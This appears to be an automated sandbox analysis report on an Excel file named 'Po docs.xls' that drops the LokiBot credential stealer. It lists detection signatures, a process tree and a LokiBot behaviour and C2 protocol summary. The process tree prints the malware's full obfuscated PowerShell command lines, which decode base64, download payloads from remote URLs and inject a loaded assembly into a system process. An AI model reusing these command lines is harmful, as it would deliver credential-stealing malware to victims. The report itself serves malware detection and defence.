Windows
Analysis Report
Po docs.xls
Overview
General Information
Detection
HTMLPhisher, Lokibot
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3456 cmdline:
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3748 cmdline:
C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 3836 cmdline:
"C:\Window s\sysTem32 \WIndOwspo wERSHELl\V 1.0\POwErs HELl.EXE" "powerSHeL L.ExE -ex ByPaSs -NoP -w 1 -C DeVICEcR EdeNTiaLDE plOymENt.e XE ; IEX ($(iEX('[S ysTem.tExt .eNCOdINg] '+[cHaR]0x 3A+[ChAr]5 8+'Utf8.ge TstrinG([S YsteM.cOnV eRT]'+[cHA R]58+[CHAr ]58+'fRoMb aSE64STRiN G('+[ChaR] 34+'JDdhMT Q0NGY0ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIGFkZC 10WVBlICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1FbUJFcm RFRmlOSXRp T24gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAnW0 RsbEltcG9y dCgiVVJsTW 9uIiwgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBD aGFyU2V0ID 0gQ2hhclNl dC5Vbmljb2 RlKV1wdWJs aWMgc3RhdG ljIGV4dGVy biBJbnRQdH IgVVJMRG93 bmxvYWRUb0 ZpbGUoSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgbU d5LHN0cmlu ZyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIFBaem FPalJ3d1As c3RyaW5nIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbUgsdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIEtRWE 1LY1JIQmMs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbkV4Tyk7 JyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uYU 1lICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIkFm IiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OYW 1FU3BBQ2Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBsYU5FRG sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtUGFz c1RocnU7IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJDdhMTQ0 NGY0OjpVUk xEb3dubG9h ZFRvRmlsZS gwLCJodHRw Oi8vMTk4Lj Q2LjE3OC4x NTEvNjUvc2 VldGhlYmVz dGh0aW5nc3 dpdGhtZXdo aWNoZ2l2ZW dyZWF0b3V0 cHV0b2ZtZW dvb2QudElG IiwiJGVOVj pBUFBEQVRB XHNlZXRoZW Jlc3RodGlu Z3N3aXRobW V3aGljaGdp dmVncmVhdG 91dHB1dG9m bS52QnMiLD AsMCk7U1RB cnQtc0xlRX AoMyk7c1RB UlQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiJE VuVjpBUFBE QVRBXHNlZX RoZWJlc3Ro dGluZ3N3aX RobWV3aGlj aGdpdmVncm VhdG91dHB1 dG9mbS52Qn Mi'+[cHar] 0X22+'))') ))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3952 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPaSs -NoP -w 1 -C DeVICEcREdeNTiaLDEplOymENt.eXE MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 4048 cmdline:
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lzsnizg\3lzsnizg.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 4056 cmdline:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F25.tmp" "c:\Users\user\AppData\Local\Temp\3lzsnizg\CSCBF63D2839AE346389099BF789A42623B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3144 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vBs" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 2512 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRTaE VMTElkWzFd KyRzaGVsTE lkWzEzXSsn eCcpICgoJ1 M3RmltYWdl JysnVXJsID 0gYkJIaHR0 cHM6Ly9kcm l2ZS5nb29n bGUuY29tL3 VjP2V4cG9y dD1kb3dubG 9hZCZpZD0x QUlWZ0pKSn YxRjZ2UzRz VU95Ym5ILX NEdlVoQll3 dXIgYkJIO1 M3RndlYkNs aWVudCA9IE 5ldy1PYmpl Y3QgU3lzdG VtLk5ldC5X ZWJDbGllbi crJ3Q7UzdG aW1hZ2VCeX RlcyA9IFM3 RndlYkNsaW VudC5Eb3du bG9hZERhJy sndGEoUzdG aW1hJysnZ2 VVcmwpO1M3 RmltYWdlVG V4dCA9Jysn IFtTeXN0ZW 0uVGUnKyd4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nJysn KFM3RmltYW dlQnl0ZXMp O1M3RnN0YX J0RmxhZyA9 IGJCSDw8Jy snQkFTRTY0 XycrJ1NUQV JUPj5iQkg7 UzdGZW5kRm xhZyA9IGIn KydCSDw8Qk FTRTY0X0VO RD4+YkJIO1 M3RnN0YXJ0 SW5kZXggPS BTN0ZpbWFn ZVRleHQuSW 5kZXhPZihT N0ZzdGFydE ZsYWcpO1M3 RmVuZEluZG V4JysnID0g UzdGaW1hZ2 VUZXh0Lklu ZGV4T2YoUz dGZW5kRmxh JysnZyk7Uz dGc3RhcnRJ bmRleCAtZ2 UgJysnMCAt YW5kIFM3Rm VuZEluZGV4 IC1ndCBTN0 ZzdCcrJ2Fy dEluZGV4O1 M3RnN0YXJ0 SW5kZXggKz 0gUzdGJysn c3RhcnRGbG FnLkxlbmcn Kyd0aDtTN0 ZiYScrJ3Nl NjRMZW5ndG ggPSBTN0Zl bmRJbmRleC AtIFM3RnN0 YXInKyd0SW 5kZXg7UzdG YmFzZTY0Q2 9tbWFuZCA9 IFM3RmltYW dlVGV4dC5T dWJzdHJpbm coUzdGc3Rh cnRJbmRleC wgUzdGYmFz ZTY0TCcrJ2 VuZ3RoKTsn KydTN0ZiYX NlNjRSZXZl cnNlZCA9IC 1qbycrJ2lu ICcrJyhTN0 ZiYXNlNjRD b21tYW5kLl RvQ2hhckFy cmF5KCkgQk RGIEZvckVh Y2gtT2JqZW N0IHsgUzdG XyB9KVsnKy ctJysnMS4n KycuLShTN0 ZiYXNlNjRD b21tYW5kLk xlbmd0aCld O1M3RmNvbW 1hbmRCeXRl cyA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coUzdGYicr J2FzZTY0Um V2ZXJzZWQp O1M3RmxvYW RlZEFzJysn c2VtJysnYm x5ID0gW1N5 c3RlbS5SZW ZsZWN0aW9u LkFzc2VtYm x5XTo6TG9h ZChTN0Zjb2 1tYScrJ25k JysnQnl0Jy snZXMpO1M3 RnZhaU1ldG hvZCA9IFtk bmxpYi5JTy 5Ib21lXScr Jy5HZXRNZX Rob2QoYkJI VkFJJysnYk JIKTtTN0Z2 YWlNZXRob2 QuSW52b2tl KFM3Rm51Jy snbGwsIEAo YkJIdHh0Lk tMTExQTVMv NTYvMTUxLj g3MS42NC44 OTEvLzpwdH RoYkJILCBi QkhkZXNhdG l2YWRvYkJI LCBiQkhkZX NhdGl2YWRv YkInKydILC BiQkhkZXNh dGl2YWRvYk JILCBiQkhh c3BuZXRfcm VnYnJvd3Nl cnNiQkgsIG JCSGRlc2F0 aXZhZG9iQk gsIGJCSGRl c2F0aXZhZG 
9iQkgsYkJI ZGVzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvJysn YkJILGJCSG Rlc2F0aXZh ZG8nKydiQk gsYkJIZGUn KydzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvYkJI LGJCSDFiQk gsYkJIZGVz YXRpdmFkb2 JCSCkpOycp LlJlUGxhY0 UoJ0JERics J3wnKS5SZV BsYWNFKCdi QkgnLFtzdF JpbmddW2No YXJdMzkpLl JlUGxhY0Uo J1M3RicsJy QnKSk=';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ ShELLId[1] +$shelLId[ 13]+'x') ( ('S7Fimage '+'Url = b BHhttps:// drive.goog le.com/uc? export=dow nload&id=1 AIVgJJJv1F 6vS4sUOybn H-sDvUhBYw ur bBH;S7F webClient = New-Obje ct System. Net.WebCli en'+'t;S7F imageBytes = S7FwebC lient.Down loadDa'+'t a(S7Fima'+ 'geUrl);S7 FimageText ='+' [Sys tem.Te'+'x t.Encoding ]::UTF8.Ge tString'+' (S7FimageB ytes);S7Fs tartFlag = bBH<<'+'B ASE64_'+'S TART>>bBH; S7FendFlag = b'+'BH< <BASE64_EN D>>bBH;S7F startIndex = S7Fimag eText.Inde xOf(S7Fsta rtFlag);S7 FendIndex' +' = S7Fim ageText.In dexOf(S7Fe ndFla'+'g) ;S7FstartI ndex -ge ' +'0 -and S 7FendIndex -gt S7Fst '+'artInde x;S7Fstart Index += S 7F'+'start Flag.Leng' +'th;S7Fba '+'se64Len gth = S7Fe ndIndex - S7Fstar'+' tIndex;S7F base64Comm and = S7Fi mageText.S ubstring(S 7FstartInd ex, S7Fbas e64L'+'eng th);'+'S7F base64Reve rsed = -jo '+'in '+'( S7Fbase64C ommand.ToC harArray() BDF ForEa ch-Object { S7F_ })[ '+'-'+'1.' +'.-(S7Fba se64Comman d.Length)] ;S7Fcomman dBytes = [ System.Con vert]::Fro mBase64Str ing(S7Fb'+ 'ase64Reve rsed);S7Fl oadedAs'+' sem'+'bly = [System. Reflection .Assembly] ::Load(S7F comma'+'nd '+'Byt'+'e s);S7FvaiM ethod = [d nlib.IO.Ho me]'+'.Get Method(bBH VAI'+'bBH) ;S7FvaiMet hod.Invoke (S7Fnu'+'l l, @(bBHtx t.KLLLPMS/ 56/151.871 .64.891//: ptthbBH, b BHdesativa dobBH, bBH desativado bB'+'H, bB Hdesativad obBH, bBHa spnet_regb rowsersbBH , bBHdesat ivadobBH, bBHdesativ adobBH,bBH desativado bBH,bBHdes ativado'+' bBH,bBHdes ativado'+' bBH,bBHde' +'sativado bBH,bBHdes ativadobBH ,bBH1bBH,b BHdesativa dobBH));') .RePlacE(' BDF','|'). RePlacE('b BH',[stRin g][char]39 ).RePlacE( 'S7F','$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - aspnet_regbrowsers.exe (PID: 3128 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: 04AA198D72229AEED129DC20201BF030) - mshta.exe (PID: 2684 cmdline:
C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 2876 cmdline:
"C:\Window s\sysTem32 \WIndOwspo wERSHELl\V 1.0\POwErs HELl.EXE" "powerSHeL L.ExE -ex ByPaSs -NoP -w 1 -C DeVICEcR EdeNTiaLDE plOymENt.e XE ; IEX ($(iEX('[S ysTem.tExt .eNCOdINg] '+[cHaR]0x 3A+[ChAr]5 8+'Utf8.ge TstrinG([S YsteM.cOnV eRT]'+[cHA R]58+[CHAr ]58+'fRoMb aSE64STRiN G('+[ChaR] 34+'JDdhMT Q0NGY0ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIGFkZC 10WVBlICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1FbUJFcm RFRmlOSXRp T24gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAnW0 RsbEltcG9y dCgiVVJsTW 9uIiwgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBD aGFyU2V0ID 0gQ2hhclNl dC5Vbmljb2 RlKV1wdWJs aWMgc3RhdG ljIGV4dGVy biBJbnRQdH IgVVJMRG93 bmxvYWRUb0 ZpbGUoSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgbU d5LHN0cmlu ZyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIFBaem FPalJ3d1As c3RyaW5nIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbUgsdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIEtRWE 1LY1JIQmMs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbkV4Tyk7 JyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uYU 1lICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIkFm IiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OYW 1FU3BBQ2Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBsYU5FRG sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtUGFz c1RocnU7IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJDdhMTQ0 NGY0OjpVUk xEb3dubG9h ZFRvRmlsZS gwLCJodHRw Oi8vMTk4Lj Q2LjE3OC4x NTEvNjUvc2 VldGhlYmVz dGh0aW5nc3 dpdGhtZXdo aWNoZ2l2ZW dyZWF0b3V0 cHV0b2ZtZW dvb2QudElG IiwiJGVOVj pBUFBEQVRB XHNlZXRoZW Jlc3RodGlu Z3N3aXRobW V3aGljaGdp dmVncmVhdG 91dHB1dG9m bS52QnMiLD AsMCk7U1RB cnQtc0xlRX AoMyk7c1RB UlQgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiJE VuVjpBUFBE QVRBXHNlZX RoZWJlc3Ro dGluZ3N3aX RobWV3aGlj aGdpdmVncm VhdG91dHB1 dG9mbS52Qn Mi'+[cHar] 0X22+'))') ))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3388 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPaSs -NoP -w 1 -C DeVICEcREdeNTiaLDEplOymENt.eXE MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3848 cmdline:
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y2w1vq2t\y2w1vq2t.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3808 cmdline:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES603A.tmp" "c:\Users\user\AppData\Local\Temp\y2w1vq2t\CSCE3D35A7BEA64426091DB9BB55EAE7DEC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3776 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vBs" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3904 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRTaE VMTElkWzFd KyRzaGVsTE lkWzEzXSsn eCcpICgoJ1 M3RmltYWdl JysnVXJsID 0gYkJIaHR0 cHM6Ly9kcm l2ZS5nb29n bGUuY29tL3 VjP2V4cG9y dD1kb3dubG 9hZCZpZD0x QUlWZ0pKSn YxRjZ2UzRz VU95Ym5ILX NEdlVoQll3 dXIgYkJIO1 M3RndlYkNs aWVudCA9IE 5ldy1PYmpl Y3QgU3lzdG VtLk5ldC5X ZWJDbGllbi crJ3Q7UzdG aW1hZ2VCeX RlcyA9IFM3 RndlYkNsaW VudC5Eb3du bG9hZERhJy sndGEoUzdG aW1hJysnZ2 VVcmwpO1M3 RmltYWdlVG V4dCA9Jysn IFtTeXN0ZW 0uVGUnKyd4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nJysn KFM3RmltYW dlQnl0ZXMp O1M3RnN0YX J0RmxhZyA9 IGJCSDw8Jy snQkFTRTY0 XycrJ1NUQV JUPj5iQkg7 UzdGZW5kRm xhZyA9IGIn KydCSDw8Qk FTRTY0X0VO RD4+YkJIO1 M3RnN0YXJ0 SW5kZXggPS BTN0ZpbWFn ZVRleHQuSW 5kZXhPZihT N0ZzdGFydE ZsYWcpO1M3 RmVuZEluZG V4JysnID0g UzdGaW1hZ2 VUZXh0Lklu ZGV4T2YoUz dGZW5kRmxh JysnZyk7Uz dGc3RhcnRJ bmRleCAtZ2 UgJysnMCAt YW5kIFM3Rm VuZEluZGV4 IC1ndCBTN0 ZzdCcrJ2Fy dEluZGV4O1 M3RnN0YXJ0 SW5kZXggKz 0gUzdGJysn c3RhcnRGbG FnLkxlbmcn Kyd0aDtTN0 ZiYScrJ3Nl NjRMZW5ndG ggPSBTN0Zl bmRJbmRleC AtIFM3RnN0 YXInKyd0SW 5kZXg7UzdG YmFzZTY0Q2 9tbWFuZCA9 IFM3RmltYW dlVGV4dC5T dWJzdHJpbm coUzdGc3Rh cnRJbmRleC wgUzdGYmFz ZTY0TCcrJ2 VuZ3RoKTsn KydTN0ZiYX NlNjRSZXZl cnNlZCA9IC 1qbycrJ2lu ICcrJyhTN0 ZiYXNlNjRD b21tYW5kLl RvQ2hhckFy cmF5KCkgQk RGIEZvckVh Y2gtT2JqZW N0IHsgUzdG XyB9KVsnKy ctJysnMS4n KycuLShTN0 ZiYXNlNjRD b21tYW5kLk xlbmd0aCld O1M3RmNvbW 1hbmRCeXRl cyA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coUzdGYicr J2FzZTY0Um V2ZXJzZWQp O1M3RmxvYW RlZEFzJysn c2VtJysnYm x5ID0gW1N5 c3RlbS5SZW ZsZWN0aW9u LkFzc2VtYm x5XTo6TG9h ZChTN0Zjb2 1tYScrJ25k JysnQnl0Jy snZXMpO1M3 RnZhaU1ldG hvZCA9IFtk bmxpYi5JTy 5Ib21lXScr Jy5HZXRNZX Rob2QoYkJI VkFJJysnYk JIKTtTN0Z2 YWlNZXRob2 QuSW52b2tl KFM3Rm51Jy snbGwsIEAo YkJIdHh0Lk tMTExQTVMv NTYvMTUxLj g3MS42NC44 OTEvLzpwdH RoYkJILCBi QkhkZXNhdG l2YWRvYkJI LCBiQkhkZX NhdGl2YWRv YkInKydILC BiQkhkZXNh dGl2YWRvYk JILCBiQkhh c3BuZXRfcm VnYnJvd3Nl cnNiQkgsIG JCSGRlc2F0 aXZhZG9iQk gsIGJCSGRl c2F0aXZhZG 
9iQkgsYkJI ZGVzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvJysn YkJILGJCSG Rlc2F0aXZh ZG8nKydiQk gsYkJIZGUn KydzYXRpdm Fkb2JCSCxi QkhkZXNhdG l2YWRvYkJI LGJCSDFiQk gsYkJIZGVz YXRpdmFkb2 JCSCkpOycp LlJlUGxhY0 UoJ0JERics J3wnKS5SZV BsYWNFKCdi QkgnLFtzdF JpbmddW2No YXJdMzkpLl JlUGxhY0Uo J1M3RicsJy QnKSk=';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 4032 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ ShELLId[1] +$shelLId[ 13]+'x') ( ('S7Fimage '+'Url = b BHhttps:// drive.goog le.com/uc? export=dow nload&id=1 AIVgJJJv1F 6vS4sUOybn H-sDvUhBYw ur bBH;S7F webClient = New-Obje ct System. Net.WebCli en'+'t;S7F imageBytes = S7FwebC lient.Down loadDa'+'t a(S7Fima'+ 'geUrl);S7 FimageText ='+' [Sys tem.Te'+'x t.Encoding ]::UTF8.Ge tString'+' (S7FimageB ytes);S7Fs tartFlag = bBH<<'+'B ASE64_'+'S TART>>bBH; S7FendFlag = b'+'BH< <BASE64_EN D>>bBH;S7F startIndex = S7Fimag eText.Inde xOf(S7Fsta rtFlag);S7 FendIndex' +' = S7Fim ageText.In dexOf(S7Fe ndFla'+'g) ;S7FstartI ndex -ge ' +'0 -and S 7FendIndex -gt S7Fst '+'artInde x;S7Fstart Index += S 7F'+'start Flag.Leng' +'th;S7Fba '+'se64Len gth = S7Fe ndIndex - S7Fstar'+' tIndex;S7F base64Comm and = S7Fi mageText.S ubstring(S 7FstartInd ex, S7Fbas e64L'+'eng th);'+'S7F base64Reve rsed = -jo '+'in '+'( S7Fbase64C ommand.ToC harArray() BDF ForEa ch-Object { S7F_ })[ '+'-'+'1.' +'.-(S7Fba se64Comman d.Length)] ;S7Fcomman dBytes = [ System.Con vert]::Fro mBase64Str ing(S7Fb'+ 'ase64Reve rsed);S7Fl oadedAs'+' sem'+'bly = [System. Reflection .Assembly] ::Load(S7F comma'+'nd '+'Byt'+'e s);S7FvaiM ethod = [d nlib.IO.Ho me]'+'.Get Method(bBH VAI'+'bBH) ;S7FvaiMet hod.Invoke (S7Fnu'+'l l, @(bBHtx t.KLLLPMS/ 56/151.871 .64.891//: ptthbBH, b BHdesativa dobBH, bBH desativado bB'+'H, bB Hdesativad obBH, bBHa spnet_regb rowsersbBH , bBHdesat ivadobBH, bBHdesativ adobBH,bBH desativado bBH,bBHdes ativado'+' bBH,bBHdes ativado'+' bBH,bBHde' +'sativado bBH,bBHdes ativadobBH ,bBH1bBH,b BHdesativa dobBH));') .RePlacE(' BDF','|'). RePlacE('b BH',[stRin g][char]39 ).RePlacE( 'S7F','$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Loki Password Stealer (PWS), LokiBot | "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe | | | |

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th through 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 through 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

File extension | File description |
---|---|
.exe | A copy of the malware that will execute every time the user account is logged into |
.lck | A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts |
.hdb | A database of hashes for data that has already been exfiltrated to the C2 server |
.kdb | A database of keylogger data that has yet to be sent to the C2 server |

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data. The second packet transmitted by Loki-Bot contains decrypted Windows credentials. The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version. The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

Byte | Payload type |
---|---|
0x26 | Stolen Cryptocurrency Wallet |
0x27 | Stolen Application Data |
0x28 | Get C2 Commands from C2 Server |
0x29 | Stolen File |
0x2A | POS (Point of Sale?) |
0x2B | Keylogger Data |
0x2C | Screenshot |

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

Byte | Instruction description |
---|---|
0x00 | Download EXE & Execute |
0x01 | Download DLL & Load #1 |
0x02 | Download DLL & Load #2 |
0x08 | Delete HDB File |
0x09 | Start Keylogger |
0x0A | Mine & Steal Data |
0x0E | Exit Loki-Bot |
0x0F | Upgrade Loki-Bot |
0x10 | Change C2 Polling Frequency |
0x11 | Delete Executables & Exit |

Suricata Signatures:

Rule SID | Rule name |
---|---|
2024311 | ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected |
2024312 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 |
2024313 | ET TROJAN Loki Bot Request for C2 Commands Detected M1 |
2024314 | ET TROJAN Loki Bot File Exfiltration Detected |
2024315 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1 |
2024316 | ET TROJAN Loki Bot Screenshot Exfiltration Detected |
2024317 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 |
2024318 | ET TROJAN Loki Bot Request for C2 Commands Detected M2 |
2024319 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2 |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
